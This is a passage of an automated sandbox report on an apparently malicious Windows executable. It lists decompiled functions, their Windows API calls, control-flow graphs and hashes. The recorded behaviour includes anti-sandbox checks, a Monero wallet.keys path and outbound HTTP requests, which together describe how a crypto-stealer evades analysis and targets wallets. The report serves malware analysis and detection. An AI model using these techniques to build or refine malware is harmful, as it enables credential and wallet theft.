                                        • Part of subcall function 00521160: GetSystemInfo.KERNEL32(?), ref: 0052116A
                                        • Part of subcall function 00521160: ExitProcess.KERNEL32 ref: 0052117E
                                        • Part of subcall function 00521110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0052112B
                                        • Part of subcall function 00521110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00521132
                                        • Part of subcall function 00521110: ExitProcess.KERNEL32 ref: 00521143
                                        • Part of subcall function 00521220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0052123E
                                        • Part of subcall function 00521220: __aulldiv.LIBCMT ref: 00521258
                                        • Part of subcall function 00521220: __aulldiv.LIBCMT ref: 00521266
                                        • Part of subcall function 00521220: ExitProcess.KERNEL32 ref: 00521294
                                        • Part of subcall function 00536770: GetUserDefaultLangID.KERNEL32 ref: 00536774
                                        • Part of subcall function 00521190: ExitProcess.KERNEL32 ref: 005211C6
                                        • Part of subcall function 00537850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,005211B7), ref: 00537880
                                        • Part of subcall function 00537850: RtlAllocateHeap.NTDLL(00000000), ref: 00537887
                                        • Part of subcall function 00537850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0053789F
                                        • Part of subcall function 005378E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00537910
                                        • Part of subcall function 005378E0: RtlAllocateHeap.NTDLL(00000000), ref: 00537917
                                        • Part of subcall function 005378E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0053792F
                                        • Part of subcall function 0053A9B0: lstrlen.KERNEL32(?,00F199F0,?,\Monero\wallet.keys,00540E17), ref: 0053A9C5
                                        • Part of subcall function 0053A9B0: lstrcpy.KERNEL32(00000000), ref: 0053AA04
                                        • Part of subcall function 0053A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0053AA12
                                        • Part of subcall function 0053A8A0: lstrcpy.KERNEL32(?,00540E17), ref: 0053A905
                                      • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00F19720,?,0054110C,?,00000000,?,00541110,?,00000000,00540AEF), ref: 00536ACA
                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00536AE8
                                      • CloseHandle.KERNEL32(00000000), ref: 00536AF9
                                      • Sleep.KERNEL32(00001770), ref: 00536B04
                                      • CloseHandle.KERNEL32(?,00000000,?,00F19720,?,0054110C,?,00000000,?,00541110,?,00000000,00540AEF), ref: 00536B1A
                                      • ExitProcess.KERNEL32 ref: 00536B22
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      • Associated: 00000000.00000002.1766321931.0000000000520000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.0000000000602000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.000000000076A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000904000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A15000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768104494.0000000000A24000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768489341.0000000000BC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768624344.0000000000BC6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                      • String ID:
                                      • API String ID: 2525456742-0
                                      • Opcode ID: 428cb0ff89ada3efd0e3dbd7b40060360e7bf2c1a6eefc52e23ac653edbcd965
                                      • Instruction ID: ad38c0991aea8f0dd6b7a1847d2a5cabf32eb2edf304fe3d377bf1fa607b1e95
                                      • Opcode Fuzzy Hash: 428cb0ff89ada3efd0e3dbd7b40060360e7bf2c1a6eefc52e23ac653edbcd965
                                      • Instruction Fuzzy Hash: 9D31CD7190421ABADB04F7F0DC5ABEEBF78BF94340F108518F252B6191DF746905CAA6
                                      Function 00521220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1436 521220-521247 call 5389b0 GlobalMemoryStatusEx 1439 521273-52127a 1436->1439 1440 521249-521271 call 53da00 * 2 1436->1440 1442 521281-521285 1439->1442 1440->1442 1444 521287 1442->1444 1445 52129a-52129d 1442->1445 1447 521292-521294 ExitProcess 1444->1447 1448 521289-521290 1444->1448 1448->1445 1448->1447
                                      APIs
                                      • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0052123E
                                      • __aulldiv.LIBCMT ref: 00521258
                                      • __aulldiv.LIBCMT ref: 00521266
                                      • ExitProcess.KERNEL32 ref: 00521294
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      • Associated: 00000000.00000002.1766321931.0000000000520000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.0000000000602000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.000000000076A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000904000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A15000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768104494.0000000000A24000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768489341.0000000000BC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768624344.0000000000BC6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                      • String ID: @
                                      • API String ID: 3404098578-2766056989
                                      • Opcode ID: 83fb8dc7434d58a6364c3188a0d1318c4fa57fab9bc876e1b3dd737c2a4c94c4
                                      • Instruction ID: 2ca952180b0953edd14b8241d28bab7b06e0f56fbd47bc7d15ab3b23f2db1b85
                                      • Opcode Fuzzy Hash: 83fb8dc7434d58a6364c3188a0d1318c4fa57fab9bc876e1b3dd737c2a4c94c4
                                      • Instruction Fuzzy Hash: 3F014BB0944308FAEB10DBE0EC49BAEBB78BF54701F248048F606B62C0D6B465418BAD
                                      Function 00536AF3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1450 536af3 1451 536b0a 1450->1451 1453 536aba-536ad7 call 53aad0 OpenEventA 1451->1453 1454 536b0c-536b22 call 536920 call 535b10 CloseHandle ExitProcess 1451->1454 1459 536af5-536b04 CloseHandle Sleep 1453->1459 1460 536ad9-536af1 call 53aad0 CreateEventA 1453->1460 1459->1451 1460->1454
                                      APIs
                                      • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00F19720,?,0054110C,?,00000000,?,00541110,?,00000000,00540AEF), ref: 00536ACA
                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00536AE8
                                      • CloseHandle.KERNEL32(00000000), ref: 00536AF9
                                      • Sleep.KERNEL32(00001770), ref: 00536B04
                                      • CloseHandle.KERNEL32(?,00000000,?,00F19720,?,0054110C,?,00000000,?,00541110,?,00000000,00540AEF), ref: 00536B1A
                                      • ExitProcess.KERNEL32 ref: 00536B22
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      • Associated: 00000000.00000002.1766321931.0000000000520000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.0000000000602000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.000000000076A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000904000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A15000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768104494.0000000000A24000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768489341.0000000000BC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768624344.0000000000BC6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                      • String ID:
                                      • API String ID: 941982115-0
                                      • Opcode ID: 23b143669540a31d1878a07588bcc63ec6e1b12d92e644be83e0a97fc93aa66f
                                      • Instruction ID: d8d0be18c76f2d67e9fa6a7ba99532c999f5e0c4a911e900d8c6833629b02715
                                      • Opcode Fuzzy Hash: 23b143669540a31d1878a07588bcc63ec6e1b12d92e644be83e0a97fc93aa66f
                                      • Instruction Fuzzy Hash: 4FF0DA7094031AFAE710ABA0DC2ABBDBF74FB44701F10C918F513B5191DBF45540DA6A
                                      Function 005247B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00524839
                                      • InternetCrackUrlA.WININET(00000000,00000000), ref: 00524849
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      • Associated: 00000000.00000002.1766321931.0000000000520000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.0000000000602000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.000000000076A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000904000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A15000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768104494.0000000000A24000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768489341.0000000000BC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768624344.0000000000BC6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CrackInternetlstrlen
                                      • String ID: <
                                      • API String ID: 1274457161-4251816714
                                      • Opcode ID: 47ed21ff943519daa283c63f636a2069a2d8c2893a3e8d988e295c42cd126978
                                      • Instruction ID: f55206db7f9ce5b2df12a97c1d7ed32acb7865c198243f47cade5f5c50182ccc
                                      • Opcode Fuzzy Hash: 47ed21ff943519daa283c63f636a2069a2d8c2893a3e8d988e295c42cd126978
                                      • Instruction Fuzzy Hash: 93213BB1D00209ABDF14DFA4E849ADE7B75FB45320F108625F969A72C1EB706A09CF81
                                      Function 005351F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 0053A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0053A7E6
                                        • Part of subcall function 00526280: InternetOpenA.WININET(00540DFE,00000001,00000000,00000000,00000000), ref: 005262E1
                                        • Part of subcall function 00526280: StrCmpCA.SHLWAPI(?,00F1E748), ref: 00526303
                                        • Part of subcall function 00526280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00526335
                                        • Part of subcall function 00526280: HttpOpenRequestA.WININET(00000000,GET,?,00F1DF48,00000000,00000000,00400100,00000000), ref: 00526385
                                        • Part of subcall function 00526280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 005263BF
                                        • Part of subcall function 00526280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 005263D1
                                      • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00535228
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      • Associated: 00000000.00000002.1766321931.0000000000520000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.0000000000602000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.000000000076A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000904000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A15000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768104494.0000000000A24000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768489341.0000000000BC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768624344.0000000000BC6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                      • String ID: ERROR$ERROR
                                      • API String ID: 3287882509-2579291623
                                      • Opcode ID: db0b732f3470ce601eb5de66cdde40e036f3eae5deb3f9b3e748f0753bf286e8
                                      • Instruction ID: c0e4df16c99c9a7b783ebb6cab1229c0e067e5e9df9333d62b0893f010e242fa
                                      • Opcode Fuzzy Hash: db0b732f3470ce601eb5de66cdde40e036f3eae5deb3f9b3e748f0753bf286e8
                                      • Instruction Fuzzy Hash: 0E113030910549BBCB14FF74DD9AAED7B38BF90300F404558F84A5B192EF30AB05CA91
                                      Function 005378E0 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00537910
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00537917
                                      • GetComputerNameA.KERNEL32(?,00000104), ref: 0053792F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      • Associated: 00000000.00000002.1766321931.0000000000520000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.0000000000602000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.000000000076A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000904000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A15000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768104494.0000000000A24000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768489341.0000000000BC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768624344.0000000000BC6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateComputerNameProcess
                                      • String ID:
                                      • API String ID: 1664310425-0
                                      • Opcode ID: dc8e632ac10c72332e8558f8365eb1a9f943e38044b67fb378dd3a4f2780b799
                                      • Instruction ID: 316e02312ff8bd2e43fec3dec8879bc7407bb5a358625507023b073c8d2d7c57
                                      • Opcode Fuzzy Hash: dc8e632ac10c72332e8558f8365eb1a9f943e38044b67fb378dd3a4f2780b799
                                      • Instruction Fuzzy Hash: 8E0186B1904309EBCB10DF95DD45BAABFB8F704B21F104219FA45E7280C37859008FA5
                                      Function 00521110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0052112B
                                      • VirtualAllocExNuma.KERNEL32(00000000), ref: 00521132
                                      • ExitProcess.KERNEL32 ref: 00521143
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      • Associated: 00000000.00000002.1766321931.0000000000520000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.0000000000602000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.000000000076A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000904000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A15000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768104494.0000000000A24000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768489341.0000000000BC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768624344.0000000000BC6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process$AllocCurrentExitNumaVirtual
                                      • String ID:
                                      • API String ID: 1103761159-0
                                      • Opcode ID: 551d70e11549fc5251d2b93311ef721d424c83314b6abbed607133bb6a83d475
                                      • Instruction ID: 97862873d78c811323761b92426d64e85ddd1355493c06392983e09941c8dcc8
                                      • Opcode Fuzzy Hash: 551d70e11549fc5251d2b93311ef721d424c83314b6abbed607133bb6a83d475
                                      • Instruction Fuzzy Hash: 28E0E670945309FBE7106BA0AC0EB097A78BF05B01F104054F709775D0D6F926409B9D
                                      Function 005210A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 005210B3
                                      • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 005210F7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      • Associated: 00000000.00000002.1766321931.0000000000520000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.0000000000602000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.000000000076A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000904000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A15000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768104494.0000000000A24000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768489341.0000000000BC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768624344.0000000000BC6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Virtual$AllocFree
                                      • String ID:
                                      • API String ID: 2087232378-0
                                      • Opcode ID: 533319df9c7f7da9de5c1e1ec15b5ec1f80dc4cde8e5a2c8703dcd780dc9ee2c
                                      • Instruction ID: 52fae7cd99a171404b202a574ecbb8f4a59876784560956302d1d11a41b3cc41
                                      • Opcode Fuzzy Hash: 533319df9c7f7da9de5c1e1ec15b5ec1f80dc4cde8e5a2c8703dcd780dc9ee2c
                                      • Instruction Fuzzy Hash: 2DF0E272641318BBE7149AA4AC4DFBBBBE8E706B15F305448F505E3280D572AF00CAA8
                                      Function 00521190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 005378E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00537910
                                        • Part of subcall function 005378E0: RtlAllocateHeap.NTDLL(00000000), ref: 00537917
                                        • Part of subcall function 005378E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0053792F
                                        • Part of subcall function 00537850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,005211B7), ref: 00537880
                                        • Part of subcall function 00537850: RtlAllocateHeap.NTDLL(00000000), ref: 00537887
                                        • Part of subcall function 00537850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0053789F
                                      • ExitProcess.KERNEL32 ref: 005211C6
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      • Associated: 00000000.00000002.1766321931.0000000000520000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.0000000000602000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.000000000076A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000904000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A15000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768104494.0000000000A24000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768489341.0000000000BC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768624344.0000000000BC6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$Process$AllocateName$ComputerExitUser
                                      • String ID:
                                      • API String ID: 3550813701-0
                                      • Opcode ID: d7e9ac0668a1b1abcf7f8e7e51f9be31a37a6c636abdb0f35d8e6b8cde3223bf
                                      • Instruction ID: f014225d17d6d94034bd4da2b7ff2b0c0b005c0336538f1a46cbb03bc852cc8b
                                      • Opcode Fuzzy Hash: d7e9ac0668a1b1abcf7f8e7e51f9be31a37a6c636abdb0f35d8e6b8cde3223bf
                                      • Instruction Fuzzy Hash: 78E012B6D1430B63CA1473F4BC0EB2B3B9C7B65355F044425FA06E2552FAA9F810C96E

                                      Non-executed Functions

                                      Function 005338B0 Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 250filestringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • wsprintfA.USER32 ref: 005338CC
                                      • FindFirstFileA.KERNEL32(?,?), ref: 005338E3
                                      • lstrcat.KERNEL32(?,?), ref: 00533935
